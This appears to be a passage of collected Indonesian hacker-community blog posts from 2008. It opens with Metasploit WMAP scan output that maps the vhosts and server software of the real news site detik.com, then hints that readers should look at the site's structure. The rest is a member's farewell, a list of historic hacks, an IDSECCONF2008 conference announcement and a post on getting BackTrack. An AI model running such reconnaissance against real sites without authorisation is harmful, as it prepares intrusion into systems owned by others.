VHOST NAME: intra.detik.com Vhost intra.detik.com found. [Mon Dec 22 00:29:41 +0300 2008]
VHOST NAME: corporate.detik.com Vhost corporate.detik.com found. [Mon Dec 22 00:29:42 +0300 2008]
VHOST NAME: www.detik.com Vhost www.detik.com found. [Mon Dec 22 00:29:45 +0300 2008]
VHOST NAME: web.detik.com Vhost web.detik.com found. [Mon Dec 22 00:29:46 +0300 2008]
[*] Done.
msf > wmap_reports -s 18
WMAP REPORT: 202.158.66.86,80,0 Metasploit WMAP Report [Mon Dec 22 00:29:19 +0300 2008]
WEB_SERVER TYPE: Apache/2.2.9 (Unix) DAV/2 PHP/5.1.6 ( Powered by PHP/5.1.6 )  [Mon Dec 22 00:29:57 +0300 2008]
[*] Done.

Itulah beberapa contoh penggunaan WMAP metasploit. Dan seperti biasa, metasploit bukanlah tools ajaib yang dengan konfigurasi standard (baca: donlot langsung pakai) dapat memuaskan para kiddies. Metasploit Framework adalah suatu framework yang memberikan lingkungan luar biasa bagi mereka-mereka yang dapat memanfaatkannya dengan sangat baik. Jangan heran jika banyak yang memiliki plugin-plugin ataupun exploit-exploit pribadi dengan metasploit framework mereka sendiri tanpa mem-publishnya kepada umum. WMAP saat ini merupakan project awal metasploit untuk penetrasi aplikasi web, dengan sifatnya yang opensource maka dalam beberapa waktu dapat kita ramalkan banyak modul-modul yang akan ditambahkan.

Untuk kalian yang hobi bermain-main dengan aplikasi web dan mencari tools yang dapat membantu proses tersebut secara otomatis serta dapat dikustomisasi maka WMAP metasploit adalah salah satu pilihan yang baik.

PS: ada yang memperhatikan bahwa detik.com memiliki struktur yang cukup unik dan menarik?

Tepat satu tahun yang lalu crasher mengundurkan diri dari K-Elektronik. Akhir tahun 2008 kembali kami harus kehilangan salah satu anggota aktif yang sudah cukup lama membangun k-elektronik dan juga memberikan warna underground tersendiri yang membuat K-Elektronik tetap teguh untuk aktif didunia Underground Indonesia.

We highly appreciate his reason, principal and decision to leave. Thanks for everything. See you in other dark area of Underground, csh.

• The WANK Worm (October 1989), Possibly the first “hacktivist” attack. the WANK (Worm Against Nuclear Killer) hit NASA offices in Greenbelt, Maryland, by running a banner across system computers as part of a protect to stop the launch of the plutonium-fueled, Jupiter-bound Galileo probe.

• U.K. Ministry of Defense Satelite Hack (February 1999), A small group of hackers traced to southern England gained controol of MoD Skynet military satelite and signaled a security intrusion characterized by officials as “information warfare”, in which an enemy attack by disrupting military communications. In the end, the hackers managed to reprogram the control system before being discovered.

• CD Universe Credit Card Breach (January 2000), A blackmail scheme gone wrong, the posting of more than 300,000 credit card numbers by hacker maxim on a Web site entitled “The Maxus Credit Card Pipeline” has remained unsolved since early 2000. Maxim stole the credit card information by by breaching CDUniverse.com; he or she then demanded $100.000 from the Web site exchange for destroying the data. While Maxim is believed to be from Eastern Europe, the case remains unsolved !.

• Military Source Code Stolen (December 2000), If there’s one thing you don’t want in the wrong hands, it’s the source code that can controol missile-guidance systems. In winterr 2000, a hacker broke into government-contracted Exigent Software Technology and nabbed two thirds of the codde for Exigent’s OS/COMET software, which is responsible for both missile and satelite guidance , from the Naval Research Lab in Washington D.C. Officials followed the trail of the intruder, “Leaf”, to the University of Kaiserslautern in Germany, but that’s wheere the trail appears to end.

Anyone can solve it ? ;P

JAKARTA, – 9 Desember 2008

13-14 Desember 2008 nanti, Pertama kalinya konferensi yang melibatkan
sebagian besar komunitas keamanan TI di Indonesia akan berlangsung di
Yogyakarta, tepatnya di UPN Veteran Yogyakarta dengan di dukung oleh
Departemen Komunikasi dan Informasi Republik Indonesia dan berbagai
sponsor lainnya.

Indonesian Security Conference 2008 atau yang lebih dikenal
IDSECCONF2008 ini adalah pertama kalinya diadakan, event ini akan
mencakup 4 jenis kegiatan besar yang akan di laksanakan selama 2 hari
penuh. Kegiatan yang terselenggara atas kerjasama organisasi/komunitas
TI non-profit dan pihak Universitas Pembangunan Nasional “Veteran”
Yogyakarta ini bertujuan untuk memberikan pencerahan ke khalayak umum,
pelajar, mahasiswa, maupun kalangan Security Professional khususnya
mengenai berbagai isu keamanan yang ada. Kegiatan yang berfokus pada
masalah Teknologi Informasi khususnya Keamanan Teknologi informasi dan
Temu Komunitas ini akan di isi dengan kegiatan Seminar selama 1 hari
penuh, Diskusi Panel, Diskusi Komunitas dan Permainan Hacking di hari
berikutnya.

Kegiatan di hari pertama (13 Desember 2008) akan diisi dengan seminar
dari 6 orang pemateri, materi yang dibahas akan sangat beragam, mulai
dari “windows hacking”, “social engineering”, “network hacking”,
“password cracking”, “dunia carding” sampai kepada melakukan
memperkuat (hardening) webserver linux anda akan di kupas tuntas
disertai demo dan sesi tanya jawab.

Kegiatan di hari kedua akan diawali dengan Diskusi panel yang
mengambil tema “Menyongsong IT di PEMILU 2009″, dengan para panelis/
narasumber yang memiliki latar belakang yang beragam, diantaranya dari
pihak Komisi Pemilihan Umum, Praktisi Pendidikan, perwakilan komite
idsecconf2008 dan masyarakat umum. Pada diskusi panel kali ini akan di
bahas berbagai aspek pemanfaatan Teknologi Informasi pada PEMILU 2009
mendatang khususnya di bidang keamanan.

Kegiatan dilanjutkan dengan Diskusi Komunitas, yang akan diwakili oleh
berbagai komunitas keamanan di Indonesia yang akan membahas mengenai
dunia Underground di Indonesia yang sangat dekat dengan dunia keamanan
khususnya. “Tamatkah Dunia Underground di Indonesia?” akan menjadi
bahasan menarik untuk di simak dengan panelis/moderator yang merupakan
perwakilan dari komunitas antihackerlink, kecoak elektronik, echo,
yogyafree, dan jasakom.

Pada hari kedua inipun akan secara bersamaan dilangsungkan Permainan
hacking, yang akan mengajak para peserta untuk merasakan secara nyata
suatu kondisi dimana dia harus mempertahankan mesin/server yang dia
miliki dari serangan dan juga melakukan serangan, disamping itu para
pesertanya juga harus dapat menyelesaikan misi-misi yang sudah di
persiapkan oleh panitia. Para peserta yang memperoleh poin tertinggi
akan menjadi pemenangnya dan berhak mendapatkan hadiah yang telah di
tentukan oleh panitia.

IDSECCONF2008 ini adalah cerminan upaya yang diberikan komunitas non-
profit khususnya untuk kemajuan pendidikan anak bangsa serta sebagai
salah satu upaya untuk mempercepat penyebaran ilmu Teknologi Informasi
di berbagai kalangan. Kegiatan yang pertama kalinya ini diharapkan
akan dapat terus di laksanakan  di tahun-tahun berikutnya.

Detail Kegiatan:

Sabtu, 13 Desember 2008
Seminar:

* theday, windows hacking with commandline
* whatsoever, hardening linux webserver in 60 minutes
* k-159, social engineering: the art of hacking
* daemonfox, speed up your password cracker: distributed password
cracking
* y3dips, mastering the network hackingFU
* indounderground, Carding, carder and why you should avoid it!

Minggu, 14 Desember 2008
Diskusi  Panel “Menyongsong IT di PEMILU 2009″
* KPU, Praktisi Pendidikan, Komite, Masyarakat

Diskusi Komunitas “Tamatkah Dunia Underground di Indonesia”
* Antihackerlink, Kecoak Elektronik, Echo, Yogyafree, Jasakom

Permainan Hacking

IDSECCONF2008 diselenggarakan atas kerjasama Komite IDSECCONF2008 &
Himpunan Mahasiswa Teknik I UPN[v] Yogyakarta, didukung oleh
Departemen Komunikasi dan Informasi Republik Indonesia.

Info lebih lanjut:

http://idsecconf.org

Biaya Tiket (2 hari) :

*Pelajar, Mahasiswa S1 : Rp. 60.000,-
*s2,s3, umum : Rp. 120.000,-
Fasilitas: Makan Siang, Makanan Ringan, Perlengkapan Seminar,
Door prize, Suvenir, Sertifikat

Pendaftaran:

Sekretariat HIMATIF
Teknik Informatika UPN “Veteran” Yogyakarta
Kampus II Babarsari, Tambak Bayan

Contact:
Fitri: (0856 4696 6692) | Dinda: (0813 1743 6110)
email: event@himatif.or.id

Komite IDSECCONF2008:
amory; az001; Cyb3rh3b; CyberTank; Hero; K-159; Kosha; negative;
onno;
Ph03n1X; sakitjiwa; s`to; the_hydra; theday; xnuxer; y3dips

Hi Jogjakarta,

idsecconf 2008

Oke, tulisan ini sengaja saya buat sebagai respon comment yang menanyakan bagaimana caranya mendapatkan Backtrack.

Pertama, Backtrack adalah salah satu distro Linux. Apa itu distro, silahkan cari sendiri pengertiannya. Backtrack adalah distro linux yang khusus mengemas aplikasi-aplikasi security penunjang proses pentest (penetration testing), selain mengemas software-software tersebut backtrack juga mempermudah proses mulai dari instalasi hingga penggunaannya. Distro backtrack dapat didownload pada link berikut ini.

Kedua, total size CD Backtrack sekitar 600-700M, dan ini termasuk sulit bagi sebagian besar masyarakat Indonesia yang tidak memiliki akses internet untuk mendapatkan CD Backtrack. Beberapa majalah mungkin mengemas cd tersebut, namun bagi yang tidak begitu beruntung tinggal di kota-kota besar bisa memanfaatkan toko online. Jaman dahulu, saya juga termasuk yang tidak beruntung memiliki fasilitas koneksi internet di rumah. Jadi untuk mendapatkan distro linux cukup dengan pergi ke warnet, register, dan memesan cd tersebut setelah memasukan seluruh identitas resmi untuk pengiriman. Ada banyak toko online yang saya rasa menjual cd backtrack, salah satunya adalah tempat favorite saya berikut ini.

Ketiga, Backtrack bukan tools magic untuk hacking. Namun Backtrack dapat mempermudah proses hacking. Jika kita ingin belajar mengenai network scanning, maka bisa mulai belajar dari tools-tools yang tersedia pada distro backtrack menu network scanning.

Sekali lagi, tulisan ini saya buat hanya untuk memberikan informasi bagi kalian-kalian yang kesulitan mendapatkan CD Backtrack namun memiliki keinginan untuk mempelajari security dengan menggunakan distro Backtrack. Informasi ini sebetulnya mudah didapatkan via google, namun bisa dimaklumi banyak sekali yang mungkin baru berkecimpung di dunia security dan belum memahami bagaimana cara mencari via google dengan baik dan benar sehingga masih bertanya-tanya mengenai hal ini.

So, masih ada yang ingin dimanjakan dengan bertanya hal-hal simple lain dibandingkan mencari sendiri via Google/forum/milis?

PS: ada komunitas backtrack indonesia yang mungkin bisa kalian ikuti untuk mencari informasi lebih jauh tentang backtrack, somehow…saat tulisan ini ditulis hostingnya lagi suspended. So…